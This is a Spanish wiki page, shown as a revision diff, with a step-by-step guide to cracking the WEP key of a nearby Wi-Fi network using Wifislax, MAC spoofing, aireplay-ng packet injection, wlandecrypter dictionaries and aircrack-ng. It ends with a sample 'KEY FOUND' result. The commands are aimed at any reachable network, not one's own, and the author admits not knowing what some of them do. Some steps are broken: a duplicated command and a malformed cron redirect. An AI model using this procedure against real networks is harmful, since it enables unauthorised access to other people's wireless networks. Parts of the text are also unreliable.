User Tools

Site Tools


informatica:linux:wifi:crackear_redes:ipw2200

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision
Previous revision
informatica:linux:wifi:crackear_redes:ipw2200 [2009/04/15 13:29] – creado 194.179.83.89informatica:linux:wifi:crackear_redes:ipw2200 [2015/04/13 20:19] (current) – external edit 127.0.0.1
Line 1: Line 1:
 redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack
  
-1. Ver las interfaces+1. Arrancar con el cd [[http://www.wifislax.com/descargas.php|Wifislax 3.1]] dentro 
 + 
 +2. Seleccionar la primera opción, entorno gráfico 
 + 
 +3. Teclear usuario y contraseña: 
 + 
 +  root 
 +  toor 
 + 
 +4. Abrir una consola (se recomienda abrir una consola por comando) 
 + 
 +5. Ver las interfaces
  
   iwconfig -a   iwconfig -a
Line 10: Line 21:
   rtap0 => interfaz wifi lista para inyectar   rtap0 => interfaz wifi lista para inyectar
      
-2. Rastrear las redes a nuestro alcance:+6. Rastrear las redes a nuestro alcance:
  
   iwlist ethx scan   iwlist ethx scan
      
-Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSID) y el canal+Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSSID) y el canal
  
-3. Por si las moscas levantar las dos interfaces:+7. Por si las moscas levantar las dos interfaces:
  
   ifconfig ethx up && ifconfig rtap0 up   ifconfig ethx up && ifconfig rtap0 up
      
-4. +8. Cambiar la mac (en el ejemplo le ponemos 00:11:22:33:44:55): 
 + 
 +  macchanger -m 00:11:22:33:44:55 eth3 
 + 
 +9. Lanzar los siguientes comandos (no sé exactamente lo que hacen): 
 + 
 +  iwconfig eth3 essid "ESSID" key 11111111111 
 +  airodump-ng -c 6 -b mac_del_ap -w captura_ESSID rtap0 
 +  aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00:11:22:33:44:55 -i rtap0 ethx 
 + 
 +10. **OPCIONAL**  
 + 
 +Habida cuenta que el equipo se puede quedar tostado, o se puede ir la luz, es conveniente programar una tarea en cron que grabe cada minuto el fichero .cap que almacena las capturas en un llavero usb o bien en el propio disco duro del pc/portátil, al objeto de poder aprovechar el trabajo realizado.  
 + 
 +11.1 Crear el guión: 
 + 
 +nano /root/script.sh 
 + 
 +11.2 Contenido (OJO, comprobad las rutas): 
 + 
 + 
 +<code> 
 +#!/bin/bash 
 + 
 +# Ejemplo para un disco duro 
 +cp /root/*cap /mnt/hda1/captura/ 
 +# Ejemplo para un llavero usb 
 +cp /root/*cap /mnt/sda1/captura/ 
 +</code> 
 + 
 +11.3 Grabar y cerrar 
 + 
 +11.Darle permisos de ejecución: 
 + 
 +  chmod +x /root/script.sh 
 + 
 +11.5 Programar la tarea en cron: 
 + 
 +  crontab -e 
 + 
 +11.6 Añadir la siguiente linea (OJO, comprobad las rutas): 
 + 
 +**Revisar**, porque el 2>1 null es importante, si no, no funciona 
 + 
 +  * * * * * /root/script.sh 2>1 null 
 + 
 +11.7 Grabar y salir 
 + 
 +12. **OPCIONAL**  
 + 
 +Existe una aplicación, 'wlandecrypter-ng' que, si la dirección MAC (BSSID) del router es una de las que soporta y el nombre del punto de acceso (ESSID) es del tipo 'WLAN_xx' (por tanto no se ha cambiado su valor de fábrica), genera un diccionario, con lo que se podrá obtener la clave del router con muy pocos paquetes (menos de 10) obtenidos. 
 + 
 +12.1 Teclear en una consola el siguiente comando: 
 + 
 +wlandecrypter BSSID ESSID /root/diccionario_ESSID 
 + 
 +Si el comando nos lanza un error, significa que la dirección MAC del router (BSSID) no está 'soportada' por wlandecrypter-ng. 
 + 
 +13. **OPCIONAL** 
 + 
 +Si pasamos el fichero /root/captura_ESSID.cap a un pc que tenga aircrack-ng instalado, saca la clave en unos pocos segundos. En caso de que lo hagamos desde el propio pc con el live-cd corriendo, puede tardar horas (7, 8...). 
 + 
 +13.1 Instalar aircrack-ng 
 + 
 +  aptitude install aircrack-ng 
 + 
 +14. Hay que estar al loro de la salida del comando 'airodump-ng', en especial de la columna que dice 'data', que son los paquetes capturados.  
 + 
 +Cuando queramos intentar sacar la contraseña, lanzamos el siguiente comando: 
 + 
 +Si hemos podido generar un diccionario en el paso 12: 
 + 
 +  aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap 
 + 
 +En caso contrario: 
 + 
 +  aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap 
 + 
 +Si tenemos suerte, aparecerá el siguiente mensaje: 
 + 
 +<code> 
 +     KEY FOUND! [ 43:30:30:31:44:32:30:33:44:35:44:31:31 ] (ASCII: C001D203D5D11 ) 
 + Decrypted correctly: 100% 
 +</code> 
 + 
 +Es **MUY** recomendable pasar el fichero .cap a un pc con aircrack-ng instalado (ver paso 13), pues de ese modo se obtiene la clave en unos pocos segundos 
 + 
 +Postdata: Yo en clientes windows, le he metido la clave alfanumérica sin los dos puntosEn el ejemplo anterior, el valor introducido sería: 
 + 
 +  43303031443230334435443131 
 + 
 + 
informatica/linux/wifi/crackear_redes/ipw2200.1239802199.txt.gz · Last modified: 2015/04/13 20:19 (external edit)